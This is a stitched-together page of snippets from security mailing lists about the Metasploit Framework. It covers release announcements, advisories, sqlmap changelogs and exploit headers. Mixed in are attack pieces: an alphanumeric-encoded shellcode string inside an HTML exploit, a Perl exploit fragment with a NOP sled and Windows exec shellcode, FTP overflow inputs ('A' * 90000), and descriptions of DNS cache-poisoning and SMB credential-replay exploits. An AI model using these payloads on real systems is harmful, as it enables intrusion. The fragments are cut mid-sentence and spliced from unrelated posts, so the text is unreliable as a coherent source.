Next Page >>
metasploit
METASPLOIT UNLEASHES VERSION 3.1 OF THE METASPLOIT FRAMEWORK
New Version of Attack Framework Ready to Pwn
Austin, Texas, January 28th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.1 of
their exploit development and attack framework. The latest version
features a graphical user interface, full support for the Windows
platform, and over 450 modules, including 265 remote exploits.
"Metasploit 3.1 consolidates a year of research and development,
We are excited to announce the immediate availability of version 3.3 of
the Metasploit Framework. This release includes 446 exploits, 216
auxiliary modules, and hundreds of payloads, including an in-memory VNC
service and the Meterpreter. In addition, the Windows payloads now
support NX, DEP, IPv6, and the Windows 7 platform. More than 180 bugs
were fixed since last year’s release of version 3.2, making this one of
the more well-tested releases yet.
- http://www.metasploit.com/framework/download/
888
888
Contact: H D Moore FOR IMMEDIATE RELEASE
Email: hdm[at]metasploit.com
Austin, Texas, November 19th, 2008 -- The Metasploit Project
announced today the free, world-wide availability of version 3.2 of
their exploit development and attack framework. The latest version
!pvefindaddr findmsp :
Log data
0BADF00D -------------------------------------------------------------------------
0BADF00D Searching for metasploit pattern references
0BADF00D -------------------------------------------------------------------------
0BADF00D [1] Checking register addresses and contents
0BADF00D ============================================
0BADF00D Register EDI points to Metasploit pattern at position 0
0BADF00D Register EAX is overwritten with Metasploit pattern at position 4096
> Exploit ID: CAU-EX-2008-0002
> Release Date: 2008.07.23
> Title: bailiwicked_host.rb
> Description: Kaminsky DNS Cache Poisoning Flaw Exploit
> Tested: BIND 9.4.1-9.4.2
> Attributes: Remote, Poison, Resolver, Metasploit
> Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
> Author/Email: I)ruid <druid (@) caughq.org>
> H D Moore <hdm (@) metasploit.com>
> ===============/========================================================
>
Exploit ID: CAU-EX-2008-0002
Release Date: 2008.07.23
Title: bailiwicked_host.rb
Description: Kaminsky DNS Cache Poisoning Flaw Exploit
Tested: BIND 9.4.1-9.4.2
Attributes: Remote, Poison, Resolver, Metasploit
Exploit URL: http://www.caughq.org/exploits/CAU-EX-2008-0002.txt
Author/Email: I)ruid <druid (@) caughq.org>
H D Moore <hdm (@) metasploit.com>
===============/========================================================
The challenges and responses obtained are saved to the file
'fullcreds.log'.
(ii) msf_smb_weak_nonce.rb
This metasploit module will perform connections to the victim until
the server responds with one of the duplicate challenges stored in
'fullcreds.log'. The module will then send the corresponding response to
gain access to the victim's SMB service.
Finally, after successful exploitation, the module will create the
file 'owned.txt' in the ADMIN$ share (c:\windows) with the following
Hi there,
MSFXDC (MetaSploit Framework eXploits Development Contest) is a
challenge where the main goal is to code the largest number of new
Metasploit Framework exploits modules.
https://www.securinfos.info/metasploit/msfxdc.php
Your mission, if you choose to accept it, is to code new exploits
modules for the Metasploit Framework (latest 3.x version).
Exploits modules must be new regarding the current Metasploit Framework
Downloads and more information: http://www.metasploit.com/
--
After five months of development, version 3.4.0 of the Metasploit
Framework has been released. Since the last major release (3.3) over 100
new exploits have been added and over 200 bugs have been fixed.
This release includes massive improvements to the Meterpreter payload;
both in terms of stability and features, thanks in large part to Stephen
Hi Alexandr!
I added a "monkey-patch" for this in the Metasploit source tree -- even if
you use Metasploit 3.1 with an unpatched version of Ruby, the patched
handler code is loaded into memory on top of the existing module. Since
the msfweb service will bind to 127.0.0.1 by default, this is not a major
risk, but it seemed prudent to patch it anyways.
The patch was pushed to the Metasploit SVN trees, which are used by the
Online Update functionality in the Windows version. Mac OS X users will
Downloads and more information at http://www.metasploit.com/
--
The Metasploit Project is proud to announce the release of the
Metasploit Framework version 3.4.1. As always, you can get it from
our downloads page, for Windows, Linux or as an OS-independent
tarball. This release sees the first official non-Windows Meterpreter
payload, in PHP as discussed last month
(http://blog.metasploit.com/2010/06/meterpreter-for-pwned-home-pages.html).
password hashes, privileges, databases, dump entire or user's
specified DBMS tables/columns, run his own SQL statement, read or
write either text or binary files on the file system, execute
arbitrary commands on the operating system, establish an out-of-band
stateful connection between the attacker box and the database server
via Metasploit payload stager, database stored procedure buffer
overflow exploitation or SMB relay attack and more.
Changes
=======
approach to penetration testing that does not rely on exploiting known
vulnerabilities. During the talk, we used a combination of new tools and
lesser-known techniques to walk through the process of compromising a
target network. The materials for this talk are now online, including the
slides, white paper, and videos. These materials can be found online at:
- http://metasploit.com/confs/
For those who missed both the talks or couldn't stay for all of one, the
white paper does a good job of covering the things we discussed:
- http://metasploit.com/confs/blackhat2007/tactical_paper.pdf
password hashes, privileges, databases, dump entire or user's
specified DBMS tables/columns, run his own SQL statement, read or
write either text or binary files on the file system, execute
arbitrary commands on the operating system, establish an out-of-band
stateful connection between the attacker box and the database server
via Metasploit payload stager, database stored procedure buffer
overflow exploitation or SMB relay attack and more.
Changes
=======
credentials (Bernardo).
* Support to parse -C (column name(s)) when fetching columns of a
table with --columns: it will enumerate only columns like the provided
one(s) within the specified table (Bernardo).
* Support for takeover features on PostgreSQL 8.4 (Bernardo).
* Enhanced --priv-esc to rely on new Metasploit Meterpreter's
'getsystem' command to elevate privileges of the user running the
back-end DBMS instance to SYSTEM on Windows (Bernardo).
* Automatic support in --os-pwn to use the web uploader/backdoor to
upload and execute the Metasploit payload stager when stacked queries
SQL injection is not supported, for instance on MySQL/PHP and
VNSECON07 ( http://conf.vnsecurity.net/ ), Ho Chi Minh, Vietnam.
You can find the intro and slides + the full-text paper at:
https://www.securinfos.info/VNSECON2007
Covered topics:
* usage, enhancement and exploit modules development for the Metasploit
Framework
* Speeding Up the exploits' Development prOcess, Kill and Undo: the MSF
eXploit Builder
The last version of the presented tool "MSF eXploit Builder" should be
Digital Security Research Group [DSecRG] Advisory #DSECRG-08-018
Application: Ruby 1.8.6 (WEBrick Web server Toolkit and applications that used WEBrick, like Metasploit 3.1)
Versions Affected: Ruby
1.8.4 and all prior versions
1.8.5-p114 and all prior versions
1.8.6-p113 and all prior versions
1.9.0-1 and all prior version
!ÙÄ* uTXÝÄÙpô]UYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLJHQTEPC0C0LKG5GLLKCLDECHC1JOLKPOB8LKQOQ0EQJKQYLKGDLKEQJNP1IPMINLK4IPD4DGIQHJDMEQHBJKJTGKPTGTC4CEKULKQOQ4C1JKBFLKDLPKLKQOELEQJKLKELLKC1JKK9QLFDETHCQOP1L6E0F6E4LKQVFPLKG0DLLKBPELNMLKCXC8LIJXK3IPCZF0E8CNN8JBCCE8LXKNMZDNPWKOJGBCCQBLBCEPAA",
"d", false, false, 80, false, true, true, 420)
</script>
</html>
Additionally, a Metasploit Framework Module has been written to
demonstrate the vulnerability.
References:
aushack.com advisory
http://www.aushack.com/200708-tumbleweed.txt
Anyway this mail is also for pointing out a new
customizable proof-of-concept which I have written yesterday and that
can be used to fully executing code remotely after having passed the
needed valid parameters (my PoC doesn't contain shellcodes, it must be
provided as external file in the classical C/Perl/hexadecimal format
like, for example, those available on The Metasploit Project):
http://aluigi.org/poc/quicktimebof.zip
The success of the exploitation depends by various factors, for example
here using the "QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3" link and
Changes
=======
Some of the new features include:
* Added a Metasploit Framework 3 auxiliary module to run sqlmap;
* Implemented possibility to test for and inject also on LIKE statements;
* Implemented --start and --stop options to set the first and the last
table entry to dump;
* Added non-interactive/batch-mode (--batch) option to make it easy to
wrap sqlmap in Metasploit and any other tool.
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
- In the hardware hacking area we have a very interesting presentation from
Travis Goodspeed on reverse engineering and exploiting wireless sensors.
Our lineup of brand new training sessions includes a physical security
training by Zac Franken and Adam Laurie entitled "RFID, Access Control and
Biometric Systems", a Metasploit course called "Tactical Exploitation" by
Metasploit creator HD Moore and a course on "Understanding and Deploying
DNNSEC" by Paul Wouters and Patrick Nauber.
As always, it's best to register early for the training of your choice to
make sure there's a place for you - seats are limited. To learn more about
More details are located at:
http://www.informit.com/guides/content.aspx?g=security&seqNum=320
http://www.informit.com/guides/content.aspx?g=security&seqNum=321
MetaSploit module is located at:
http://www.whitewolfsecurity.com/security/metasploit/fileutility.txt
Workaround: Uninstall the software from the PC/Mac.
Vendor Response: Vendor has released an update that fixes only the file
While they were arguing what the meaning of "responsible" is in
"responsible disclosure", I overheard that a critical pre-
authentication Remote Code Execution vulnerability affecting EMC
Documentum was silently reported to EMC in 2006. The vulnerability
was later silently fixed. No credit was given. No credit was taken.
No Metasploit module was developed.
If you are using Documentum to manage your intellectual properties,
you know what you should do. Many critical vulnerabilities were
silently
fixed. Your expensive VM tools don't have any information about
HELP ('A' * 90000)
NLST ('A' * 90000)
TYPE ('A' * 90000)
Here is an auxiliary module for metasploit...
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
The POC was tested on Windows XP Pro SP3 w/ Internet Explorer 7 - All patched
Also Windows XP Pro SP2 w/ Internet Explorer 7
By the way, props go out to shinnai for his tool, Roadmap.
Major thanks go out to HD Moore and the Metasploit project/crew =) www.metasploit.com
Thanks sCORPINo =P www.snoop-security.com
The author of this POC is not responsible for any stupid shit you do with it =)
------------------------------------------------------------------------------------------------------------
<html>
Best regards,
RISE Security
Bug traq wrote:
> I bought a new beautiful ACER with windows XP... the first thing i looked at is the Windows XP SP2 without upgrades ... o my fucking GOD... i can exploit it with metasploit !!!!!!!!! i dont believe ... lets upgrade ?? ok ... no more exploitation
> :(
>
> You see ... is the same scenario :)
>
> lol
I bought a new beautiful ACER with windows XP... the first thing i looked at is the Windows XP SP2 without upgrades ... o my fucking GOD... i can exploit it with metasploit !!!!!!!!! i dont believe ... lets upgrade ?? ok ... no more exploitation
:(
You see ... is the same scenario :)
lol
-----Original Message-----
From: RISE Security [mailto:advisories@risesecurity.org]
# alpha[at]hacker.bz
# Made in Tunisia
my $junk = "\x41" x 96 ; # whatever bytes
my $nop = "\x90" x 20 ; # bla bla xD
# win32_exec - EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub , thanks metasploit
my $shellcode =
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xc9".
"\x2c\xc9\x40\x83\xeb\xfc\xe2\xf4\x35\xc4\x8d\x40\xc9\x2c\x42\x05".
"\xf5\xa7\xb5\x45\xb1\x2d\x26\xcb\x86\x34\x42\x1f\xe9\x2d\x22\x09".
"\x42\x18\x42\x41\x27\x1d\x09\xd9\x65\xa8\x09\x34\xce\xed\x03\x4d".
And the new versions of OS use the ASLR mechanism. All this makes the old methods of attacks impossible.
But on BlackHat DC 2010 the interesting way to bypass DEP and ASLR in browsers (not only)
and Just-In-Time compilers was presented. This method is called JIT-SPRAY. But here was no one public PoC until now.
In this text we are describe how to write a shellcode for new JIT-Spray attacks and make universal STAGE 0 shellcode
that gives control to any common shellcode from MetaSploit, for example.
http://www.dsecrg.com/files/pub/pdf/Writing%20JIT-Spray%20Shellcode%20for%20fun%20and%20profit.pdf
As we give much attention on ERP and Business applications security
you can also download new exploits for popular client side Business applications
Next Page>>
|
